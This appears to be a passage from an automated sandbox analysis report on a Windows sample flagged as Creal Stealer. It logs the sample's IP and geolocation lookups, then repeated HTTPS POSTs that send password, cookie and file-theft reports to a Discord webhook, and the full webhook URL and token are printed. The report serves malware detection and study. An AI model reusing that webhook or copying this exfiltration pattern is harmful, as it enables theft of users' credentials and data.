Feb 14, 2023 04:50:22.324009895 CET	8.8.8.8	192.168.2.5	0x4ad6	No error (0)	canary.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.324009895 CET	8.8.8.8	192.168.2.5	0x4ad6	No error (0)	canary.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.995713949 CET	8.8.8.8	192.168.2.5	0x144c	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 14, 2023 04:50:22.995713949 CET	8.8.8.8	192.168.2.5	0x144c	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.995713949 CET	8.8.8.8	192.168.2.5	0x144c	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:22.995713949 CET	8.8.8.8	192.168.2.5	0x144c	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:24.851963043 CET	8.8.8.8	192.168.2.5	0xa73d	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.168028116 CET	8.8.8.8	192.168.2.5	0x952c	No error (0)	canary.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.168028116 CET	8.8.8.8	192.168.2.5	0x952c	No error (0)	canary.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.168028116 CET	8.8.8.8	192.168.2.5	0x952c	No error (0)	canary.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.168028116 CET	8.8.8.8	192.168.2.5	0x952c	No error (0)	canary.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Feb 14, 2023 04:50:25.168028116 CET	8.8.8.8	192.168.2.5	0x952c	No error (0)	canary.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

geolocation-db.com

canary.discord.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49689	104.237.62.211	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	Direction	Data
2023-02-14 03:50:16 UTC	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:16 UTC	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 14 Feb 2023 03:50:16 GMT Vary: Origin Connection: close
2023-02-14 03:50:16 UTC	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33 Data Ascii: 84.17.52.13

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49691	173.231.16.76	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	Direction	Data
2023-02-14 03:50:16 UTC	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:17 UTC	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 14 Feb 2023 03:50:16 GMT Vary: Origin Connection: close
2023-02-14 03:50:17 UTC	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33 Data Ascii: 84.17.52.13

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49701	159.89.102.253	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:24 UTC	9	OUT	GET /jsonp/84.17.52.13 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:25 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 14 Feb 2023 03:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-02-14 03:50:25 UTC	9	IN	Data Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49702	162.159.137.232	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:25 UTC	9	OUT	POST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1 Accept-Encoding: identity Content-Length: 527 Host: canary.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-02-14 03:50:25 UTC	10	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 Data Ascii: {"content": ":flag_it: - `user \| 84.17.52.13 (Italy)`", "embeds": [{"color": 0, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer", "icon_url": "htt
2023-02-14 03:50:25 UTC	10	IN	HTTP/1.1 204 No Content Date: Tue, 14 Feb 2023 03:50:25 GMT Content-Type: text/html; charset=utf-8 Connection: close CF-Ray: 7992d6e7f9f63801-FRA Set-Cookie: __dcfduid=b6c6fa40ac1a11eda3380e6de71ba7ab; Expires=Sun, 13-Feb-2028 03:50:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Via: 1.1 google CF-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Content-Type-Options: nosniff x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1676346626 x-ratelimit-reset-after: 1 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u3ad1arqJDKHKfOEYtBOpmRWov6wKlSoMBCfXMrje8F29mJdz9U1K%2F6CctTduu8FJdKP9QaC5bRmid0aS6W%2FzXN%2Frvhmx0cZTqZV5CKplMUD63rpSZOc%2BPl3ctRoM7WJchwRjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=b6c6fa40ac1a11eda3380e6de71ba7abacf54662f1128c811b771f1270f6bc115f5fb2f8b2ee18dcf83093c128cb1e70; Expires=Sun, 13-Feb-2028 03:50:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=f85be939e8d594d89dab82432393e5c66f53a441-1676346625; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49693	159.89.102.253	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	Direction	Data
2023-02-14 03:50:17 UTC	OUT	GET /jsonp/84.17.52.13 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:17 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 14 Feb 2023 03:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-02-14 03:50:17 UTC	IN	Data Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49692	159.89.102.253	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:17 UTC	0	OUT	GET /jsonp/84.17.52.13 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:17 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 14 Feb 2023 03:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-02-14 03:50:17 UTC	1	IN	Data Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49694	162.159.128.233	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:19 UTC	1	OUT	POST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1 Accept-Encoding: identity Content-Length: 670 Host: canary.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-02-14 03:50:19 UTC	1	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72 Data Ascii: {"content": ":flag_it: - `user \| 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0 Passwor
2023-02-14 03:50:19 UTC	3	IN	HTTP/1.1 204 No Content Date: Tue, 14 Feb 2023 03:50:19 GMT Content-Type: text/html; charset=utf-8 Connection: close CF-Ray: 7992d6c1197f920b-FRA Set-Cookie: __dcfduid=b314816aac1a11ed8e172a194de8b40d; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Via: 1.1 google CF-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Content-Type-Options: nosniff x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1676346620 x-ratelimit-reset-after: 1 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xkCuZm%2B1XauURy7r3UW0zAT5lw%2BvuQW9NX7b%2B8jV7f5rW2JJwjMpQOXgGXhc%2Bc%2BxqcpHrmZDAysQMnTySy1ZQkBR4Y2BieAidgzNOwKb%2BpBdGkDMMt84pAGbgLw343%2BbUARDQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=b314816aac1a11ed8e172a194de8b40dabc6efea3fad7435a666a2977c14d0b86066e64609e131cd7c31e38c0873d8aa; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=f2bfa2cf0bc7ca71eb942a3ce4ffa790a6fa1aa7-1676346619; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49695	162.159.128.233	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:19 UTC	2	OUT	POST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1 Accept-Encoding: identity Content-Length: 453 Host: canary.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-02-14 03:50:19 UTC	2	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 30 35 30 34 39 32 35 39 33 31 31 34 34 35 36 31 32 34 2f 31 30 35 31 34 39 30 33 32 30 39 32 31 31 34 35 33 38 Data Ascii: {"content": ":flag_it: - `user \| 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 0, "footer": {"text": "Creal Stealer", "icon_url": "https://cdn.discordapp.com/attachments/1050492593114456124/105149032092114538
2023-02-14 03:50:19 UTC	4	IN	HTTP/1.1 204 No Content Date: Tue, 14 Feb 2023 03:50:19 GMT Content-Type: text/html; charset=utf-8 Connection: close CF-Ray: 7992d6c18d269152-FRA Set-Cookie: __dcfduid=b31e00b4ac1a11ed9b3bce217cb5ef60; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Via: 1.1 google CF-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Content-Type-Options: nosniff x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1676346620 x-ratelimit-reset-after: 1 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GyENSV%2BKj4EKsyjPCyY5WHVmdk51hfk38%2B3FCKGFsAAYsqaDFk%2FuiT%2BqzJWiN7uLXd4KGUSfnjnLBJ6MREIOEz7cdkZ0plvo8m61LBxgYed1FnCyG6wr74BDGsGD9aaZwjMuyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=b31e00b4ac1a11ed9b3bce217cb5ef601f88dfecdf5ddc17b7ee7b9e0172c0b5b4274f43ea0faeba7893c6913e6a46db; Expires=Sun, 13-Feb-2028 03:50:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=f2bfa2cf0bc7ca71eb942a3ce4ffa790a6fa1aa7-1676346619; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49697	64.185.227.155	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:21 UTC	5	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:21 UTC	6	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 14 Feb 2023 03:50:21 GMT Vary: Origin Connection: close
2023-02-14 03:50:21 UTC	6	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33 Data Ascii: 84.17.52.13

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49698	159.89.102.253	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:22 UTC	6	OUT	GET /jsonp/84.17.52.13 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:22 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 14 Feb 2023 03:50:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-02-14 03:50:22 UTC	6	IN	Data Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49699	162.159.137.232	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:22 UTC	6	OUT	POST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1 Accept-Encoding: identity Content-Length: 669 Host: canary.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-02-14 03:50:22 UTC	6	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 43 6f 6f 6b 69 65 73 20 46 6f 75 6e 64 Data Ascii: {"content": ":flag_it: - `user \| 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 0 Cookies Found
2023-02-14 03:50:22 UTC	7	IN	HTTP/1.1 204 No Content Date: Tue, 14 Feb 2023 03:50:22 GMT Content-Type: text/html; charset=utf-8 Connection: close CF-Ray: 7992d6d63d89367e-FRA Set-Cookie: __dcfduid=b51969bcac1a11edbe26cabc9eaeceaf; Expires=Sun, 13-Feb-2028 03:50:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Via: 1.1 google CF-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Content-Type-Options: nosniff x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1676346623 x-ratelimit-reset-after: 1 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nja%2FxDHtC%2FNkKX%2BKKILax1grPkPaxkXtAXjiBeKZnOfMfU9EpjCQRSqNxvSgbxmlkO64AH56rhbKpfzXinSCFDPS0gz6c0%2BgSK4yeSO3KMIILMtXnyO%2FrcwAZl9lIbqBPXeZYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=b51969bcac1a11edbe26cabc9eaeceaf7288fadfe1e6871c5e8af70062a7ef52ba4ec41e9f0d97de20bc39e7cc4d8bb5; Expires=Sun, 13-Feb-2028 03:50:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=c7ba20fec203bf82e8e8f2724f3feea44acfc855-1676346622; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49700	104.237.62.211	443	C:\Users\user\Desktop\322pVOVprx.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-14 03:50:24 UTC	8	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-02-14 03:50:24 UTC	9	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 14 Feb 2023 03:50:24 GMT Vary: Origin Connection: close
2023-02-14 03:50:24 UTC	9	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33 Data Ascii: 84.17.52.13

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 322pVOVprx.exePID: 6060, Parent PID: 3324

General

Target ID:	0
Start time:	04:50:02
Start date:	14/02/2023
Path:	C:\Users\user\Desktop\322pVOVprx.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\322pVOVprx.exe
Imagebase:	0x7ff6e5ab0000
File size:	13686532 bytes
MD5 hash:	B051BBE6F5678560E4594B4C65CCA682
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 322pVOVprx.exePID: 6084, Parent PID: 6060

General

Target ID:	1
Start time:	04:50:07
Start date:	14/02/2023
Path:	C:\Users\user\Desktop\322pVOVprx.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\322pVOVprx.exe
Imagebase:	0x7ff6e5ab0000
File size:	13686532 bytes
MD5 hash:	B051BBE6F5678560E4594B4C65CCA682
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exePID: 6112, Parent PID: 6084

General

Target ID:	2
Start time:	04:50:11
Start date:	14/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff627730000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 6120, Parent PID: 6112

General

Target ID:	3
Start time:	04:50:11
Start date:	14/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high